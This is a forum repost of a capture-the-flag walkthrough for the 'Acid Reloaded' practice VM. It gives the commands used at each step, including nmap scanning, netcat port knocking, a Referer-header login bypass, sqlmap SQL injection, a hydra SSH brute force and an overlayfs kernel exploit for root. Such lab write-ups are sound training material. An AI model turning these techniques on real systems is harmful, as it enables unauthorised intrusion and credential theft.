• We just launched and are currently in beta. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

Hack Acid Reloaded VM (CTF Challenge)

d3m0ns

Quantum Network Specialist
D Rep
0
0
0
Rep
0
D Vouches
0
0
0
Vouches
0
Posts
107
Likes
122
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2 1000 XP
The named of the Virtual machine is ā€œAcid-Reloadedā€, It is created by Avinash Thappa. This Virtual Machine contains both network logics and web logics. You will need to extract the RAR and run the vmx using VMplayer. The machine has DHCP active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game.

GOAL: Escalate the privileges to the root user and capture the flag. Once anyone able to beat the box then shoots me a mail

Penetrating Methodologies
  • Network scanning (netdiscover, nmap)
  • Port knocking (Netcat)
  • Abusing HTTP web service (Brupsuite)
  • SQL injection (Sqlmap)
  • SSH Brute-Force (Hydra)
  • Access PTY shell (ssh login)
  • Kernel privilege escalation

Letā€™s Begin!!

As always start by finding our target

Code:
netdiscover

1.png


This tells us that our target is 192.168.1.106. Now is time to scan with nmap.

Code:
nmap -A 192.168.1.106

2.png


The result of nmap shows us that only port 22 is open with the service of SSH. Letā€™s check out this 22 port.

Code:
ssh 192.168.1.106


Wann Knock me out???
Sounds like port knocking hint, therefore, letā€™s go for port knocking.

3.png


Checking out port 22 hints (3.2.1 letā€™s Start the Game) we will use the netcat Port Knocking technique.

Code:
nc 192.168.1.106 3
nc 192.168.1.106 2
nc 192.168.1.106 1

4.png


Letā€™s scan with nmap again.

Code:
nmap -p- -A 192.168.1.106

Port knocking helped us to open port 33447 on which the service of HTTP was redirected.

5.png


Now open the target IP on the browser using this port.

Code:
http://192.168.1.106/33447

6.png


A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. Itā€™s time to use dirb for a directory brute-force attack.

Code:
dirb http://192.168.1.106/33447

7.png


It put-up so many web directories but to me /bin/ might be interesting as it might have a shell system. No harm in checking it out in browsing so letā€™s do that.

8.png


And itā€™s a login portal. Now letā€™s check its page source.

9.png


In the page source, there is a directory called: includes/validation.php. I decided to check it out.


Unfortunately!
I could not find anything on it. So decided to use DirBuster to find out about directories.

10.png


In the DirBuster give the URL and for wordlist use medium 1.0-word list. And then click on the Start button and it will start finding directories. So it found so many PHP files as shown below.

11.png


I checked every directory related to the bin and only /bin/dashboard.php was useful. When I opened it in the browser, I found nothing useful so I looked into the page source and even that proved to be non-useful.

11_0.png


When nothing helped I decided to capture its cookies using BurpSuite. To capture the cookies using BurpSuite, set proxy and then turn on the interception and then simply reload the page. When the cookies are captured just add the following below the Host.

Referer : http://192.168.1.106:33447/bin/includes/validation.php

11_1.png


And now as soon as you will hit the forward button it will automatically log in.

11_2.png


On the page it says to click and when you do that it will redirect to the following page.

12.png


There was nothing on the redirected page or its page source. So decided to check for SQL injection, and search for a web page with id=1. Luckily we have made the right prediction and got the following result for id=1.

13.png


Using a single quote (ā€˜) I check for SQL injection and got MySQL error message which means the web application is vulnerable to SQL injection.

14.png


So decided to use SQLMap.

Code:
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 --dbs --tamper=space2comment --batch

15.png


We got database name secure_login, now letā€™s find out tables.

16.png


Code:
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 -D secure_login --table --tamper=space2comment

It shows us the name of the table i.e. UB3R/strcpy.exe

17.png


When I opened
/UB3R/strcpy.exe
in the browser, a dialogue box opened and asked to save a file and so I did.

18.png


Now use the file command to know more it and found PDF document V 1.5, then used the foremost tool which is a forensic tool which is used to recover files using their headers and footers.

Code:
file strcpy.exe
foremost strcpy.exe

19.png


As soon as you will run the above command a folder is created with the name of output. Letā€™s check out this folder.

Code:
cd output
ls

There is a text file in the folder with the name of an audit, I decided to read it through cat command.

Code:
cat audit.txt

20.png


There is a .rar which I decided to unrar.

Code:
unrar x 00000213.rar

On unzipping there are two files that have been extracted i.e. acid.txt and lol.jpg. I decided to read acid.txt

Code:
cat acid.txt

This .txt tells us that we are on the right path. So of course next I opened lol.jpg

Code:
exiftool lol.jpg

But found nothing. So I unzipped it.

Code:
unrar e lol.jpg

21.png


Unzipping the
gave me two files again, one was ā€œ
ā€ and another ā€œ
Avinash.contact
ā€. So I opened hint.txt which told me to go with Avinash.contact, so I next opened.

Code:
cat hint.txt
cat Avinash.contact

22.png


There was a base64 code given in the file so we decoded the base64 code with help of echo as shown and it turned to be NooB@123.

Syntax: echo Base64 text | base64 -d

23.png


And then applied brute force on SSH using the text file that I just created with random words. With help of the following command, we try to crack the password for SSH and successfully obtained two credential for SSH login.

Code:
hydra -L user.txt -p NooB@123 -u 192.168.1.106 ssh

24.png


And it gave us makke: NooB@123 as username and password respectively. And so I logged in with SSH.

Code:

Give the password when asked. And when I logged in I checked kernelā€™s version and tried to download its exploit but it didnā€™t happen. All the options for downloading were blocked so started exploring.

So I directly went for the/bin.

Code:
cd /bin
ls

25.png


In the/bin, there were files called overlayfs. This is a famous exploit so I executed it

Code:
./overlayfs
id
ls ā€“la

And then, fortunately, there was a flag.txt.

Code:
cat flag.txt

26.png


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
 

452,496

342,837

342,845

Top